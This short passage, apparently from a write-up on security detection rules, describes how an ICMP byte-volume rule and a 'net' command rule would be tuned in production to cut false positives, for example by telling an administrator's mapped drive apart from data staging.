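In production the ICMP rule would aggregate bytes per source/destination pair over a window rather than judge single events, and the net rule would be joined with the logged-on user and parent process to separate an administrator's mapped drive from a staging step.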